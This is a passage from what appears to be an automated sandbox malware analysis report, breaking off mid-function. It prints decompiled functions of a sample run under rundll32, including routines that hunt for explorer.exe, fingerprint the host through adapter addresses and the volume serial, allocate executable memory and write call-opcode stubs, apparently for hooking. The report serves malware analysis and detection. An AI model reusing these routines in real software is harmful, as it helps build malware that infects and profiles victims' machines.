                          • Instruction Fuzzy Hash: 9991DA79A00109DFCB48CF98D590EAEB7B6FF88304F148159E809AB341D735EA56CFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 028D70D0 Relevance: 3.1, APIs: 2, Instructions: 86memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 028D716B
                          • VirtualProtect.KERNEL32(?,00000004,?,?), ref: 028D71A3
                          Memory Dump Source
                          • Source File: 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_28d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 0a894fec6175854ae8b2712809d142e72fa9094a0c42227173d89027c1b642ac
                          • Instruction ID: c46a20dacc3467db527b866f1b36218408011467d5577e6fbb32ea9908a008b9
                          • Opcode Fuzzy Hash: 0a894fec6175854ae8b2712809d142e72fa9094a0c42227173d89027c1b642ac
                          • Instruction Fuzzy Hash: 2C416678A00209DFCF04CF88C891AEDB7B6FF88314F148299E919AB355D775AA45CF94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 028D6B20 Relevance: 3.1, APIs: 2, Instructions: 77libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryExA.KERNEL32(?,00000000,00000000), ref: 028D6B7B
                          • GetProcAddress.KERNEL32(?,?), ref: 028D6BDA
                          Memory Dump Source
                          • Source File: 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_28d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID:
                          • API String ID: 2574300362-0
                          • Opcode ID: 6d5c053a8b1e1b56e3ea23abd1abaa051be6f67e11c47a19d1c305c84768a659
                          • Instruction ID: 24e3a90b313c5a81451c7d9b1d72a25b71e93645eb345794d47afb51ce22fd28
                          • Opcode Fuzzy Hash: 6d5c053a8b1e1b56e3ea23abd1abaa051be6f67e11c47a19d1c305c84768a659
                          • Instruction Fuzzy Hash: 00319678A00219DFCB04CF98C890BADB7B5FF88314F1486A9D819AB355D735AA45CF94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D2E90 Relevance: 3.0, APIs: 2, Instructions: 49stringCOMMON
                          Download Yara Rule
                          C-Code - Quality: 83%
                          			E042D2E90(CHAR* _a4) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				char _v276;
				char _v4372;
				signed int _t23;
				void* _t26;
				int _t29;
				void* _t40;
				void* _t41;

				E042D1420(0x1110);
				_t23 =  &_v12;
				_push(_t23);
				_push(0x1000);
				_push( &_v4372); // executed
				L042D3BDD(); // executed
				if(_t23 != 0) {
					_v16 = _v12 >> 2;
					_v8 = 0;
					while(_v8 < _v16) {
						_t26 = E042D2F30( *((intOrPtr*)(_t40 + _v8 * 4 - 0x1110)),  &_v276); // executed
						_t41 = _t41 + 8;
						if(_t26 == 0) {
							L8:
							_t23 = _v8 + 1;
							_v8 = _t23;
							continue;
						}
						_t29 = lstrcmpiA( &_v276, _a4); // executed
						if(_t29 != 0) {
							goto L8;
						}
						return  *((intOrPtr*)(_t40 + _v8 * 4 - 0x1110));
					}
					return _t23 | 0xffffffff;
				}
				return _t23 | 0xffffffff;
			}













                          0x042d2e98
                          0x042d2e9d
                          0x042d2ea0
                          0x042d2ea1
                          0x042d2eac
                          0x042d2ead
                          0x042d2eb4
                          0x042d2ec1
                          0x042d2ec4
                          0x042d2ed6
                          0x042d2ef0
                          0x042d2ef5
                          0x042d2efa
                          0x042d2f1d
                          0x042d2ed0
                          0x042d2ed3
                          0x00000000
                          0x042d2ed3
                          0x042d2f07
                          0x042d2f0f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x042d2f14
                          0x00000000
                          0x042d2f1f
                          0x00000000

                          APIs
                          • K32EnumProcesses.KERNEL32(?,00001000,042D2E03,?,042D2E03,explorer.exe), ref: 042D2EAD
                          • lstrcmpiA.KERNEL32(?,042D2E03), ref: 042D2F07
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: EnumProcesseslstrcmpi
                          • String ID:
                          • API String ID: 1246086236-0
                          • Opcode ID: db4a566eff626a45b078d73c5ac58332103477f4d940c420c0e2d80d875773ed
                          • Instruction ID: 63f43f11ef112b9f275a7019ee10b1de10c7b1838a229228443fd4ef898fff99
                          • Opcode Fuzzy Hash: db4a566eff626a45b078d73c5ac58332103477f4d940c420c0e2d80d875773ed
                          • Instruction Fuzzy Hash: E8115270F20108EBCB19DF94D841AEDB3B8BF48344F508AD9EA1593180E7B5BE40DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 028D6820 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 028D68A4
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_28d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: VirtualAlloc
                          • API String ID: 4275171209-164498762
                          • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                          • Instruction ID: 8294fdad5df03de1e777259f7d69bfb2a0d74c4ab5dd0b73d8583a5b16d60f77
                          • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                          • Instruction Fuzzy Hash: 1B111F64D082CDEEEF01D7E89409BEFBFB55F11704F044098D6486B282E6BE57588BB6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0281BC44 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0281BC44(intOrPtr __eax) {
				intOrPtr _v8;
				signed int _v12;
				struct HINSTANCE__* _v16;
				struct HICON__* _t25;
				void* _t27;
				struct HINSTANCE__* _t28;

				_v8 = __eax;
				 *((intOrPtr*)(_v8 + 0x60)) = LoadCursorA(0, 0x7f00);
				_v12 = 0xffffffea;
				do {
					if(_v12 < 0xffffffef || _v12 > 0xfffffff4) {
						if(_v12 != 0xffffffeb) {
							_v16 = 0;
						} else {
							goto L4;
						}
					} else {
						L4:
						_t28 =  *0x2865668; // 0x27d0000
						_v16 = _t28;
					}
					_t25 = LoadCursorA(_v16,  *(0x2863d74 + _v12 * 4)); // executed
					_t27 = E0281BDA8(_v8, _t25, _v12);
					_v12 = _v12 + 1;
				} while (_v12 != 0xffffffff);
				return _t27;
			}









                          0x0281bc4a
                          0x0281bc5c
                          0x0281bc5f
                          0x0281bc66
                          0x0281bc6a
                          0x0281bc76
                          0x0281bc84
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0281bc78
                          0x0281bc78
                          0x0281bc78
                          0x0281bc7d
                          0x0281bc7d
                          0x0281bc96
                          0x0281bca3
                          0x0281bca8
                          0x0281bcab
                          0x0281bcb4

                          APIs
                          • LoadCursorA.USER32(00000000,00007F00), ref: 0281BC54
                          • LoadCursorA.USER32(?,000000EB), ref: 0281BC96
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CursorLoad
                          • String ID:
                          • API String ID: 3238433803-0
                          • Opcode ID: f68140bb902021483f764d5ecb4e1212ea959ab31011903cc604e3f0c8846740
                          • Instruction ID: 9e1ed53879f65b367b44839e726051193b68d408ffd1d29acf41a17760e84d94
                          • Opcode Fuzzy Hash: f68140bb902021483f764d5ecb4e1212ea959ab31011903cc604e3f0c8846740
                          • Instruction Fuzzy Hash: 6601DA78E00209EFDB50DBACD88499DB7B9EB05324F2043A5D569E72D0D7316A51CF41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D2490 Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E042D2490() {
				int _v8;
				long _v12;
				char _v272;
				int _t13;
				void* _t18;

				_v8 = GetWindowsDirectoryA( &_v272, 0x104);
				if(_v8 == 0) {
					L3:
					return 0;
				}
				 *((char*)(_t18 + 0xfffffffffffffef7)) = 0;
				_t13 = GetVolumeInformationA( &_v272, 0, 0,  &_v12, 0, 0, 0, 0); // executed
				if(_t13 == 0) {
					goto L3;
				}
				return _v12;
			}








                          0x042d24ab
                          0x042d24b2
                          0x042d24ea
                          0x00000000
                          0x042d24ea
                          0x042d24bc
                          0x042d24db
                          0x042d24e3
                          0x00000000
                          0x00000000
                          0x00000000

                          APIs
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 042D24A5
                          • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 042D24DB
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: DirectoryInformationVolumeWindows
                          • String ID:
                          • API String ID: 3487004747-0
                          • Opcode ID: 32858df302bf139e12d0a8f03f38b1ef4fa7d9006168f4a9b3bc632831f5b1f4
                          • Instruction ID: a95496f7074f4099bbbeb3d3deeb5154822994d7c7dd4e600627b602631ee7bc
                          • Opcode Fuzzy Hash: 32858df302bf139e12d0a8f03f38b1ef4fa7d9006168f4a9b3bc632831f5b1f4
                          • Instruction Fuzzy Hash: 04F05E70B51308ABE734DBA4DC1ABEA7768D701700F1041E4AA45EA1C0D7F4AA84CFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D1870 Relevance: 2.6, APIs: 2, Instructions: 85sleepCOMMON
                          Download Yara Rule
                          C-Code - Quality: 82%
                          			E042D1870(void* __eflags) {
				intOrPtr _v8;
				long _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t32;
				intOrPtr _t35;
				void* _t38;
				void* _t40;
				void* _t52;
				void* _t55;

				_v12 = 0x100000;
				_t28 = E042D1390(_v12); // executed
				_v20 = _t28;
				_t29 = E042D1390(_v12); // executed
				_v24 = _t29;
				_t30 = E042D1390(0x1000);
				_t55 = _t52 + 0xc;
				_v8 = _t30;
				_v32 = 1;
				while(1) {
					_t58 = _v32 - 1;
					if(_v32 != 1) {
						break;
					}
					_t32 = E042D1AA0( &_v36, _t58, _v20, _v12,  &_v36); // executed
					_t55 = _t55 + 0xc;
					if(_t32 != 1) {
						L12:
						Sleep(0xea60); // executed
						_t30 = E042D15C0();
						Sleep(0xea60); // executed
						continue;
					}
					_t35 = E042D1560(_v20 + 4, _v24);
					_t55 = _t55 + 8;
					_v36 = _t35;
					_v16 = _v24;
					while(1 != 0) {
						_v16 = E042D17B0(_v16, _v16, _v8);
						_t38 = E042D27B0(_v16, _v8);
						_t55 = _t55 + 0xc;
						if(_t38 == 1) {
							_v28 = 0;
							_t46 = _v8;
							_t40 = E042D1630(_v8, _v8,  &_v28);
							_t55 = _t55 + 8;
							if(_t40 == 1 && _v28 == 0) {
								E042D14E0(_t46, _v8);
								_t55 = _t55 + 4;
							}
						}
						if(_v16 != 0) {
							continue;
						} else {
							goto L12;
						}
					}
					goto L12;
				}
				return _t30;
			}




















                          0x042d1876
                          0x042d1881
                          0x042d1889
                          0x042d1890
                          0x042d1898
                          0x042d18a0
                          0x042d18a5
                          0x042d18a8
                          0x042d18ab
                          0x042d18b2
                          0x042d18b2
                          0x042d18b6
                          0x00000000
                          0x00000000
                          0x042d18c8
                          0x042d18cd
                          0x042d18d3
                          0x042d195a
                          0x042d195f
                          0x042d1965
                          0x042d196f
                          0x00000000
                          0x042d196f
                          0x042d18e4
                          0x042d18e9
                          0x042d18ec
                          0x042d18f2
                          0x042d18f5
                          0x042d190e
                          0x042d1915
                          0x042d191a
                          0x042d1920
                          0x042d1922
                          0x042d192d
                          0x042d1931
                          0x042d1936
                          0x042d193c
                          0x042d1948
                          0x042d194d
                          0x042d194d
                          0x042d193c
                          0x042d1954
                          0x00000000
                          0x042d1956
                          0x00000000
                          0x042d1956
                          0x042d1954
                          0x00000000
                          0x042d18f5
                          0x042d197d

                          APIs
                            • Part of subcall function 042D1390: GetProcessHeap.KERNEL32(?,042D1886,00100000), ref: 042D139C
                            • Part of subcall function 042D1390: RtlAllocateHeap.NTDLL(028F0000,00000000,042D1886,?,042D1886,00100000), ref: 042D13BD
                            • Part of subcall function 042D1AA0: GetVersion.KERNEL32(?,042D18CD,?,00100000,?), ref: 042D1AAD
                            • Part of subcall function 042D1AA0: wsprintfA.USER32 ref: 042D1B5E
                          • Sleep.KERNEL32(0000EA60), ref: 042D195F
                          • Sleep.KERNEL32(0000EA60), ref: 042D196F
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HeapSleep$AllocateProcessVersionwsprintf
                          • String ID:
                          • API String ID: 1739176888-0
                          • Opcode ID: 4af7a933fddc20463fee907449698ad24d429565870155f8ef7a2feccadf699f
                          • Instruction ID: 5580ff67cca34f072e39b838e4443d540b23c434c008ffbcee928eb86ba6c507
                          • Opcode Fuzzy Hash: 4af7a933fddc20463fee907449698ad24d429565870155f8ef7a2feccadf699f
                          • Instruction Fuzzy Hash: 1331C3B5F20209EBEF10DFD4D840AFEB778AF08308F044528D409B2648E735BA64CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027D15D4 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E027D15D4(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E027D1488(0x28655ec, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}







                          0x027d15d7
                          0x027d15e1
                          0x027d15f0
                          0x027d15e3
                          0x027d15e3
                          0x027d15e3
                          0x027d15f6
                          0x027d1603
                          0x027d1608
                          0x027d160a
                          0x027d160e
                          0x027d1617
                          0x027d161e
                          0x027d162a
                          0x027d1631
                          0x00000000
                          0x027d1631
                          0x027d161e
                          0x027d1636

                          APIs
                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,027D18DD), ref: 027D1603
                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,027D18DD), ref: 027D162A
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: 24a000190a06cdb371e100419e6716b7e0fb732d5b968c1ee4e69d5306f9c780
                          • Instruction ID: 32e1481a2ac73f6ca5e8a63f3f0c4dde1662bc30f05c037f54308a2507b5b487
                          • Opcode Fuzzy Hash: 24a000190a06cdb371e100419e6716b7e0fb732d5b968c1ee4e69d5306f9c780
                          • Instruction Fuzzy Hash: 60F0A7B6F0063016DB6155694C88B535AA69F45B91F994070FA0CFF3C8D6A1880146A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D1C70 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                          Download Yara Rule
                          C-Code - Quality: 71%
                          			E042D1C70(void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t61;
				void* _t62;

				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x18], xmm0");
				_v12 = 0x8000;
				_t33 = E042D1390(_v12); // executed
				_t62 = _t61 + 4;
				_v16 = _t33;
				_v8 = _v16;
				_t34 = _v8;
				__imp__GetAdaptersAddresses(2, 0, 0, _t34,  &_v12); // executed
				_v20 = _t34;
				if(_v20 == 0) {
					while(_v8 != 0) {
						E042D14A0( &_v36, 0, 8);
						E042D1450( &_v36, _v8 + 0x2c,  *((intOrPtr*)(_v8 + 0x34)));
						_t62 = _t62 + 0x18;
						_v28 = _v28 ^ _v36;
						_v24 = _v24 ^ _v32;
						_v8 =  *((intOrPtr*)(_v8 + 8));
					}
				}
				E042D13D0(_v16); // executed
				_t36 = E042D2490(); // executed
				_v44 = _t36;
				_v40 = 0;
				return E042D1400(_v44, 0x20, _v40) ^ _v28;
			}


















                          0x042d1c76
                          0x042d1c79
                          0x042d1c7e
                          0x042d1c89
                          0x042d1c8e
                          0x042d1c91
                          0x042d1c97
                          0x042d1c9e
                          0x042d1ca8
                          0x042d1cae
                          0x042d1cb5
                          0x042d1cb7
                          0x042d1cc5
                          0x042d1cdf
                          0x042d1ce4
                          0x042d1cf3
                          0x042d1cf6
                          0x042d1cff
                          0x042d1cff
                          0x042d1cb7
                          0x042d1d08
                          0x042d1d10
                          0x042d1d17
                          0x042d1d1a
                          0x042d1d33

                          APIs
                            • Part of subcall function 042D1390: GetProcessHeap.KERNEL32(?,042D1886,00100000), ref: 042D139C
                            • Part of subcall function 042D1390: RtlAllocateHeap.NTDLL(028F0000,00000000,042D1886,?,042D1886,00100000), ref: 042D13BD
                          • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,00008000), ref: 042D1CA8
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AdaptersAddressesAllocateProcess
                          • String ID:
                          • API String ID: 2964925633-0
                          • Opcode ID: a3d16a2f61c95b189ec453819ea0af62ad065d1e956fce76a8b202fbd92d765e
                          • Instruction ID: ef04411aaa43851a7bc392eb80af8eaf4f3d6bc6e7c90e0a6484450f559e7aa1
                          • Opcode Fuzzy Hash: a3d16a2f61c95b189ec453819ea0af62ad065d1e956fce76a8b202fbd92d765e
                          • Instruction Fuzzy Hash: 2A21D6B5E10209ABDB04DFE4D981BEEF7B5BF4C204F208559E905B7640E770AA54CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027D5520 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E027D5520(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x27d0000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E027D575C(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0x27d0000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}








                          0x027d5528
                          0x027d552e
                          0x027d553a
                          0x027d553e
                          0x027d5547
                          0x027d554c
                          0x027d554e
                          0x027d5553
                          0x027d5555
                          0x027d5558
                          0x027d5558
                          0x027d5553
                          0x027d5566

                          APIs
                          • GetModuleFileNameA.KERNEL32(027D0000,?,00000105), ref: 027D553E
                            • Part of subcall function 027D575C: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00001205,028630A4), ref: 027D5778
                            • Part of subcall function 027D575C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00001205,028630A4), ref: 027D5796
                            • Part of subcall function 027D575C: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00001205,028630A4), ref: 027D57B4
                            • Part of subcall function 027D575C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 027D57D2
                            • Part of subcall function 027D575C: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,027D5861,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 027D581B
                            • Part of subcall function 027D575C: RegQueryValueExA.ADVAPI32(?,027D59C8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,027D5861,?,80000001), ref: 027D5839
                            • Part of subcall function 027D575C: RegCloseKey.ADVAPI32(?,027D5868,00000000,?,?,00000000,027D5861,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 027D585B
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Open$FileModuleNameQueryValue$Close
                          • String ID:
                          • API String ID: 2796650324-0
                          • Opcode ID: 6c231b345b31c13747d350bb63c2da7179c5706e65c0d16ae7bfc64740ef4e43
                          • Instruction ID: 8dc60fced891c8286c1c1daa49b2fbb36ae1e016dd2c05faeea2648b43b2f7b0
                          • Opcode Fuzzy Hash: 6c231b345b31c13747d350bb63c2da7179c5706e65c0d16ae7bfc64740ef4e43
                          • Instruction Fuzzy Hash: 30E0ED75A002249BCF11DE5C88C4B4637E9AB08764F444951ED69CF246D371DA508BE5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D13D0 Relevance: 1.5, APIs: 1, Instructions: 12memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E042D13D0(void* _a4) {
				void* _t2;
				char _t4;
				void* _t5;

				if( *0x42d715c != 0) {
					_t5 =  *0x42d715c; // 0x28f0000
					_t4 = RtlFreeHeap(_t5, 0, _a4); // executed
					return _t4;
				}
				return _t2;
			}






                          0x042d13da
                          0x042d13e2
                          0x042d13e9
                          0x00000000
                          0x042d13e9
                          0x042d13f0

                          APIs
                          • RtlFreeHeap.NTDLL(028F0000,00000000,042D1D0D,?,042D1D0D,?,?,?,?,042D2645,?,042D1ABB), ref: 042D13E9
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeHeap
                          • String ID:
                          • API String ID: 3298025750-0
                          • Opcode ID: 6a1d3964f673bd24c58ee01f065786a53b6b0936525465f94196d92dfbd572fe
                          • Instruction ID: d74b788cbbaffd30cf01999d5210b7a7ced86b7d9897ee983f76cc0ad4e5240d
                          • Opcode Fuzzy Hash: 6a1d3964f673bd24c58ee01f065786a53b6b0936525465f94196d92dfbd572fe
                          • Instruction Fuzzy Hash: C3C012317012059BD2089E89F84CBB5336DD348301F404105F60C47680C67DEC50CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027D1768 Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E027D1768(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x28655ec; // 0x2917b84
				while(_t29 != 0x28655ec) {
					_t7 = _t29 + 8; // 0x41d0000
					_t17 =  *_t7;
					_t8 = _t29 + 0xc; // 0x100000
					_t27 =  *_t8 + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}












                          0x027d176f
                          0x027d1773
                          0x027d177a
                          0x027d178f
                          0x027d1797
                          0x027d179d
                          0x027d17a3
                          0x027d17a6
                          0x027d17ea
                          0x027d17ae
                          0x027d17ae
                          0x027d17b1
                          0x027d17b4
                          0x027d17b8
                          0x027d17ba
                          0x027d17ba
                          0x027d17c0
                          0x027d17c2
                          0x027d17c2
                          0x027d17c8
                          0x027d17d5
                          0x027d17dc
                          0x027d17de
                          0x027d17e4
                          0x00000000
                          0x027d17e4
                          0x027d17dc
                          0x027d17e8
                          0x027d17e8
                          0x027d17f9

                          APIs
                          • VirtualAlloc.KERNEL32(041D0000,?,00001000,00000004), ref: 027D17D5
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 08b3c6f18e48fbbbf72bb470b863ee9a97cc651b767493cec29e725fac1ebee6
                          • Instruction ID: f638ccc3a88029a2c6b43c2e76b176c0ed9bd867180961401306bdf70cd43407
                          • Opcode Fuzzy Hash: 08b3c6f18e48fbbbf72bb470b863ee9a97cc651b767493cec29e725fac1ebee6
                          • Instruction Fuzzy Hash: 73113CB6A056029BC310CF29D984A6ABBE6EBC4761F45C52CE59C97364D730AC40CA91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027F48F8 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E027F48F8(intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void _t15;
				intOrPtr _t25;
				char* _t26;
				void* _t35;

				if( *0x286588c == 0) {
					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
					_t35 = _t14;
					_t15 =  *0x2865888; // 0x27b0000
					 *_t35 = _t15;
					_t1 = _t35 + 4; // 0x4
					E027D2978(0x28635bc, 2, _t1);
					_t2 = _t35 + 5; // 0x5
					 *((intOrPtr*)(_t35 + 6)) = E027F48F0(_t2, E027F48D0);
					_t4 = _t35 + 0xa; // 0xa
					_t26 = _t4;
					do {
						 *_t26 = 0xe8;
